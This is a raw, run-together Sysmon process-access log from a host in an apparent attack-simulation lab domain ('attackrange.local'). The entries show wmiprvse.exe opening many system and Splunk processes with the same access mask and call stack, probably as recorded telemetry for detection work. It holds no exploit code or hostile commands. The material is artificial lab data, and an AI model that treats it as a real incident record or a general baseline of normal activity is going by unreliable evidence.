15:59:22.319{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-5357-6008-3E06-00000000A301}6760C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024138Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:22.319{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-5356-6008-3906-00000000A301}4832C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024137Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:22.319{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-5354-6008-3406-00000000A301}6596C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024136Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:22.319{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-5353-6008-2F06-00000000A301}3716C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024135Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:22.319{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4FA9-6008-4405-00000000A301}7000C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024134Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:22.319{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4FA9-6008-4305-00000000A301}7420C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024133Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:22.319{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4DC0-6008-FB02-00000000A301}8056C:\Program Files\Internet Explorer\iexplore.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024132Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:22.319{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A9B-6008-1501-00000000A301}6076C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024131Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:22.319{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A99-6008-1401-00000000A301}5960C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024130Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:22.319{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A8C-6008-0601-00000000A301}2500C:\Windows\Explorer.EXE0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024129Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:22.319{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A8A-6008-FF00-00000000A301}4808C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024128Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:22.319{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A8A-6008-FC00-00000000A301}5008C:\Windows\System32\rdpclip.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024127Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:22.319{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A88-6008-F600-00000000A301}1548C:\Windows\system32\dwm.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024126Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:22.304{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A88-6008-F300-00000000A301}4180C:\Windows\system32\winlogon.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024125Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:22.304{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A27-6008-E400-00000000A301}2860C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024124Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:22.304{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A22-6008-DB00-00000000A301}4244C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024123Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:22.304{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A1A-6008-B100-00000000A301}2640C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024122Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:22.304{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A19-6008-AD00-00000000A301}4236C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024121Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:22.304{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A11-6008-9600-00000000A301}4612C:\Windows\System32\msdtc.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024120Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:22.304{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-49BC-6008-8200-00000000A301}4876C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024119Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 